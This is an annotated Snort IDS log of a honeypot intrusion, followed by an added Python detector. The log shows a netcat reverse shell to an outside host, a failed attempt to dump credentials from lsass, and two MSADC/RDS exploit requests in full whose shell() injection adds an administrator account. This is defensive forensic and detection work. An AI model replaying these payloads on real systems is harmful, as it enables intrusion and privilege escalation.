=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:30.414996 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25468 IpLen:20 DgmLen:171 DF
***AP*** Seq: 0x2CBF2100 Ack: 0x9E43FF78 Win: 0x1DD9 TcpLen: 20
cd data dou..The system cannot find the path specified.....C:\Pr
ogram Files\Common Files\ODBC>..C:\Program Files\Common Files\OD
BC>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:33.819933 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27260 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x2CBF2183 Ack: 0x9E43FF89 Win: 0x1DC8 TcpLen: 20
cd data sources....C:\Program Files\Common Files\ODBC\Data Sourc
es>..C:\Program Files\Common Files\ODBC\Data Sources>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:34.721659 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28028 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF21F8 Ack: 0x9E43FF8E Win: 0x1DC3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\ODBC\Da
ta Sources....12/07/00 03:35p ...12/07/00
03:35p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Explores some more... Navigates to C:\Program Files\Common Files\ODBC\Data Sources and lists files but there is nothing interesting there.
[**] netcat session 6969 [**]
02/04-05:57:35.562852 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28540 IpLen:20 DgmLen:466 DF
***AP*** Seq: 0x2CBF21F8 Ack: 0x9E43FF8E Win: 0x1DC3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\ODBC\Da
ta Sources....12/07/00 03:35p ...12/07/00
03:35p .... 2 File(s)
0 bytes.. 1,690,852,864 bytes
free....C:\Program Files\Common Files\ODBC\Data Sources>..C:\Pro
gram Files\Common Files\ODBC\Data Sources>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:38.026075 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29308 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x2CBF23A2 Ack: 0x9E43FF94 Win: 0x1DBD TcpLen: 20
cd......C:\Program Files\Common Files\ODBC>..C:\Program Files\Co
mmon Files\ODBC>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:49.743294 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:30588 IpLen:20 DgmLen:111 DF
***AP*** Seq: 0x2CBF23F2 Ack: 0x9E43FF9E Win: 0x1DB3 TcpLen: 20
cd ......C:\Program Files\Common Files>..C:\Program Files\Common
Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:50.144062 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:30844 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF2439 Ack: 0x9E43FFA0 Win: 0x1DB1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files....12/0
7/00 03:11p ...12/07/00 03:11p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:50.641450 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31100 IpLen:20 DgmLen:410 DF
***AP*** Seq: 0x2CBF2501 Ack: 0x9E43FFA0 Win: 0x1DB1 TcpLen: 20
....12/07/00 03:23p Microsoft Shared
..12/07/00 03:35p ODBC..12/07/00 03:23p
Services..12/07/00 03:23p
System.. 6 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program F
iles\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:52.847781 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32124 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x2CBF2673 Ack: 0x9E43FFAD Win: 0x1DA4 TcpLen: 20
cd system....C:\Program Files\Common Files\System>..C:\Program F
iles\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:53.206700 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32380 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF26CC Ack: 0x9E43FFB0 Win: 0x1DA1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System.
...12/07/00 03:23p ...12/07/00 03:23p
213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32636 IpLen:20 DgmLen:420 DF
***AP*** Seq: 0x2CBF2794 Ack: 0x9E43FFB0 Win: 0x1DA1 TcpLen: 20
R> ....12/07/00 03:34p ado..02/0
4/01 06:43a msadc..12/07/00 03:34p
ole db..11/11/97 12:50p 399,120
wab32.dll.. 6 File(s) 399,120 bytes..
1,690,852,864 bytes free....C:\Program Files
\Common Files\System>..C:\Program Files\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:55.852276 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33916 IpLen:20 DgmLen:172 DF
***AP*** Seq: 0x2CBF2910 Ack: 0x9E43FFBA Win: 0x1D97 TcpLen: 20
cd msads..The system cannot find the path specified.....C:\Progr
am Files\Common Files\System>..C:\Program Files\Common Files\Sys
tem>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:56.753913 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34428 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF2994 Ack: 0x9E43FFBF Win: 0x1D92 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System.
...12/07/00 03:23p ...12/07/00 03:23p
213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34684 IpLen:20 DgmLen:420 DF
***AP*** Seq: 0x2CBF2A5C Ack: 0x9E43FFBF Win: 0x1D92 TcpLen: 20
R> ....12/07/00 03:34p ado..02/0
4/01 06:43a msadc..12/07/00 03:34p
ole db..11/11/97 12:50p 399,120
wab32.dll.. 6 File(s) 399,120 bytes..
1,690,852,864 bytes free....C:\Program Files
\Common Files\System>..C:\Program Files\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:00.158631 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:36476 IpLen:20 DgmLen:199 DF
***AP*** Seq: 0x2CBF2BD8 Ack: 0x9E43FFCC Win: 0x1D85 TcpLen: 20
cd msas.dcs..The filename, directory name, or volume label synta
x is incorrect.....C:\Program Files\Common Files\System>..C:\Pro
gram Files\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:02.562069 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37756 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x2CBF2C77 Ack: 0x9E43FFD8 Win: 0x1D79 TcpLen: 20
cd msadc....C:\Program Files\Common Files\System\msadc>..C:\Prog
ram Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Navigates the remote shell to the C:\Program Files\Common Files\System\msadc directory and lists its files.
[**] netcat session 6969 [**]
02/04-05:58:02.912752 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38268 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF2CDB Ack: 0x9E43FFDB Win: 0x1D76 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System\
msadc....02/04/01 06:43a ...02/04/01 06:
43a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:03.438577 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38524 IpLen:20 DgmLen:912 DF
***AP*** Seq: 0x2CBF2DA3 Ack: 0x9E43FFDB Win: 0x1D76 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..09/25/97 08:28a
172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23,312 msa
dcf.dll..09/25/97 08:24a 91,408 msadco.dll..09/2
5/97 08:19a 5,120 msadcor.dll..09/26/97 08:19a
42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..02/04/01 06:41a 32,768 pdump.e
xe..10/02/97 07:28a 19,388 readme.txt..02/04/01
06:41a 36,864 samdump.dll.. 15 File
(s) 698,285 bytes.. 1,690,852,86
4 bytes free....C:\Program Files\Common Files\System\msadc>..C:\
Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:06.720069 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39292 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBF310B Ack: 0x9E43FFE0 Win: 0x1D71 TcpLen: 20
psu..The name specified is not recognized as an..internal or ext
ernal command, operable program or batch file.....C:\Program Fil
es\Common Files\System\msadc>..C:\Program Files\Common Files\Sys
tem\msadc
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:07.265712 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39548 IpLen:20 DgmLen:41 DF
***AP*** Seq: 0x2CBF31D4 Ack: 0x9E43FFE0 Win: 0x1D71 TcpLen: 20
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:08.972120 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40572 IpLen:20 DgmLen:47 DF
***AP*** Seq: 0x2CBF31D5 Ack: 0x9E43FFE7 Win: 0x1D6A TcpLen: 20
pdump..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to run pdump from the remote shell, but this fails due to access limitations.
!@# This is not a privileged shell.
[**] netcat session 6969 [**]
02/04-05:58:09.463709 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40828 IpLen:20 DgmLen:166 DF
***AP*** Seq: 0x2CBF31DC Ack: 0x9E43FFE7 Win: 0x1D6A TcpLen: 20
Failed to open lsass: 5. Exiting.....C:\Program Files\Common Fi
les\System\msadc>..C:\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:33.807880 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43132 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF325A Ack: 0x9E43FFF2 Win: 0x1D5F TcpLen: 20
net start..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to list out running services with 'net start' command
[**] netcat session 6969 [**]
02/04-05:58:34.294693 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43388 IpLen:20 DgmLen:635 DF
***AP*** Seq: 0x2CBF3265 Ack: 0x9E43FFF2 Win: 0x1D5F TcpLen: 20
These Windows NT services are started:..... Alerter.. Comput
er Browser.. EventLog.. FTP Publishing Service.. IIS Admin
Service.. License Logging Service.. Messenger.. MSDTC..
Net Logon.. NT LM Security Support Provider.. Plug and Play
.. Protected Storage.. Remote Procedure Call (RPC) Locator..
Remote Procedure Call (RPC) Service.. Server.. Spooler..
TCP/IP NetBIOS Helper.. Workstation.. World Wide Web Publi
shing Service....The command completed successfully........C:\Pr
ogram Files\Common Files\System\msadc>..C:\Program Files\Common
Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to add an account named 'testuser' to the system with a password of 'UgotHacked'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:59:02.703557 213.116.251.162:1956 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13196 IpLen:20 DgmLen:773 DF
***AP*** Seq: 0xACF2E27C Ack: 0x2CCD81F5 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 579..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 370..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r. .t.e.s.t.u.s.e.r. .U.g.o.t.H.a.c.k.e.d. ./.A.D.D
.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s.
.D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l
.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;
...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to add an account named 'testuser' to the administrators group
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:59:18.120717 213.116.251.162:1958 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13208 IpLen:20 DgmLen:793 DF
***AP*** Seq: 0xAD2F216E Ack: 0x2CCDBE51 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 599..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 390..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .A.d.m.i.n.i.s.t.r.a.t.o.r.s. .t.e.s
.t.u.s.e.r. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o
.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:
.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c
.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
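!@# The two RDS/MSADC POSTs above carry their SQL query and connect string as UTF-16LE, which Snort renders as the dotted 'S.e.l.e.c.t.' text.
!@# The detector below is an added example, not part of the original capture: it recovers that text from raw request bytes or from the Snort dump and flags the |shell("...")| escape. The x-varg framing bytes in its sample request are placeholders, and the 64-column dump width is an assumption.

```python
"""Detection helpers for RDS/MSADC command injection via msadcs.dll.

Added example for this capture analysis; it is not code from the original
log. The RDS DataFactory endpoint takes an application/x-varg body whose
SQL query and connect string are UTF-16LE text. The query in the capture
uses the Jet/VBA |shell("...")| escape to run cmd.exe, so a detector only
has to recover that text and look for shell(.
"""
import re
from typing import List, Optional

MSADC_TARGET = b"/msadc/msadcs.dll/AdvancedDataFactory.Query"
# The shell() escape inside the SQL text, as it appears in the capture.
SHELL_RE = re.compile(r'\|shell\(\s*"([^"]*)"\s*\)\|', re.IGNORECASE)
# Runs of printable UTF-16LE characters: each ASCII char is followed by a NUL.
UTF16_RUN_RE = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")
# The same runs in Snort's printable dump, where every NUL is rendered as '.'.
DUMP_RUN_RE = re.compile(r"(?:[ -~]\.){8,}")
SNORT_DUMP_WIDTH = 64  # assumption: Snort wraps payload dumps at 64 columns


def utf16_strings(body: bytes) -> List[str]:
    """Pull readable UTF-16LE string runs out of a raw x-varg body."""
    return [run.decode("utf-16-le") for run in UTF16_RUN_RE.findall(body)]


def shell_commands(text: str) -> List[str]:
    """Return every command string wrapped in |shell("...")| within text."""
    return [m.group(1) for m in SHELL_RE.finditer(text)]


def inspect_request(raw: bytes) -> Optional[dict]:
    """Classify one raw HTTP request; returns a finding or None.

    Only POSTs to the RDS DataFactory endpoint are examined. Any such
    request reaching an Internet-facing IIS box is worth an alert; one
    carrying shell() is active exploitation.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    if not request_line.startswith(b"POST ") or MSADC_TARGET not in request_line:
        return None
    strings = utf16_strings(body)
    commands = [cmd for s in strings for cmd in shell_commands(s)]
    return {
        "endpoint": MSADC_TARGET.decode(),
        "strings": strings,
        "commands": commands,
        "severity": "exploit" if commands else "probe",
    }


def decode_snort_dump(dump_lines: List[str]) -> List[str]:
    """Recover UTF-16LE text from Snort's printable payload dump.

    'S.e.l.e.c.t.' in the dump is the UTF-16LE word 'Select'. Lines are
    re-padded to the dump width (a trailing space that pairs with a NUL is
    often trimmed when the log is copied), joined, and every aligned
    (char, '.') pair is collapsed to its char.
    """
    joined = "".join(line.rstrip("\r\n").ljust(SNORT_DUMP_WIDTH) for line in dump_lines)
    return [run[0::2] for run in DUMP_RUN_RE.findall(joined)]


# --- constructed sample input (test data, not a replay of the capture) ------
QUERY = ("Select * from Customers where City='"
         '|shell("cmd /c net user testuser UgotHacked /ADD")|\'')
CONNECT = r"driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;"
# The x-varg framing bytes below are placeholders, not the real encoding.
SAMPLE_BODY = (b"\x02\x00\x00\x00" + QUERY.encode("utf-16-le")
               + b"\x00\x08\x00" + CONNECT.encode("utf-16-le"))
SAMPLE_REQUEST = (b"POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1\r\n"
                  b"User-Agent: ACTIVEDATA\r\nHost: lab.wiretrip.net\r\n"
                  b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n\r\n"
                  + SAMPLE_BODY)
# Payload lines of the first MSADC POST exactly as rendered in this log.
SAMPLE_DUMP_LINES = [
    "Length: 370..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m",
    ".e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.\".c.m.d. ./.c. .n",
    ".e.t. .u.s.e.r. .t.e.s.t.u.s.e.r. .U.g.o.t.H.a.c.k.e.d. ./.A.D.D",
    ".\".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s.",
    ".D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\\.w.i.n.n.t.\\.h.e.l",
    ".p.\\.i.i.s.\\.h.t.m.\\.t.u.t.o.r.i.a.l.\\.b.t.c.u.s.t.m.r...m.d.b.;",
    "...--!ADM!ROX!YOUR!WORLD!--..",
]

if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST))
    print(shell_commands("".join(decode_snort_dump(SAMPLE_DUMP_LINES))))
```

Pointing inspect_request at each reassembled request to port 80 gives a per-request verdict; the dump decoder is for working from an existing Snort alert file like this one.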
[**] IDS311/ping-scanner-L3retriever [**]
02/04-05:59:36.446543 213.116.251.162 -> 172.16.1.106
ICMP TTL:111 TOS:0x0 ID:13214 IpLen:20 DgmLen:60
Type:8 Code:0 ID:1280 Seq:256 ECHO
abcdefghijklmnopqrstuvwabcdefghi
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] IDS311/ping-scanner-L3retriever [**]
02/04-05:59:37.614592 213.116.251.162 -> 172.16.1.106
ICMP TTL:111 TOS:0x0 ID:13215 IpLen:20 DgmLen:60
Type:8 Code:0 ID:1280 Seq:512 ECHO
abcdefghijklmnopqrstuvwabcdefghi
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] IDS311/ping-scanner-L3retriever [**]
02/04-05:59:38.937424 213.116.251.162 -> 172.16.1.106
ICMP TTL:111 TOS:0x0 ID:13216 IpLen:20 DgmLen:60
Type:8 Code:0 ID:1280 Seq:768 ECHO
abcdefghijklmnopqrstuvwabcdefghi
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Checks the users in administrators group from remote shell. User 'testuser' is not there.
[**] netcat session 6969 [**]
02/04-05:59:54.726438 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54396 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF34B8 Ack: 0x9E440011 Win: 0x1D40 TcpLen: 20
net localgroup administrators..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:59:55.197885 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54908 IpLen:20 DgmLen:465 DF
***AP*** Seq: 0x2CBF34D7 Ack: 0x9E440011 Win: 0x1D40 TcpLen: 20
Alias name administrators..Comment Members can fully
administer the computer/domain....Members.....------------------
-------------------------------------------------------------..A
dministrator Domain Admins IUSR_KENNY
..IWAM_KENNY ..The command completed suc
cessfully........C:\Program Files\Common Files\System\msadc>..C:
\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:12.753036 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56444 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBF3680 Ack: 0x9E440018 Win: 0x1D39 TcpLen: 20
dir....The name specified is not recognized as an..internal or e
xternal command, operable program or batch file.....C:\Program F
iles\Common Files\System\msadc>..C:\Program Files\Common Files\S
ystem\msa
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:13.222896 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56700 IpLen:20 DgmLen:43 DF
***AP*** Seq: 0x2CBF3749 Ack: 0x9E440018 Win: 0x1D39 TcpLen: 20
dc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:15.262971 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:57724 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF374C Ack: 0x9E440023 Win: 0x1D2E TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Lists users and does not see user 'testuser'
[**] netcat session 6969 [**]
02/04-06:00:15.749652 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:57980 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF3757 Ack: 0x9E440023 Win: 0x1D2E TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:19.968496 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59260 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF38B8 Ack: 0x9E44002E Win: 0x1D23 TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:20.446143 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59516 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF38C3 Ack: 0x9E44002E Win: 0x1D23 TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:24.173249 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61820 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBF3A24 Ack: 0x9E44003C Win: 0x1D15 TcpLen: 20
net users /?..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:24.647619 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:62076 IpLen:20 DgmLen:323 DF
***AP*** Seq: 0x2CBF3A32 Ack: 0x9E44003C Win: 0x1D15 TcpLen: 20
The syntax of this command is:.......NET USER [username [passwor
d | *] [options]] [/DOMAIN].. username {password | *} /A
DD [options] [/DOMAIN].. username [/DELETE] [/DOMAIN]...
...C:\Program Files\Common Files\System\msadc>..C:\Program Files
\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
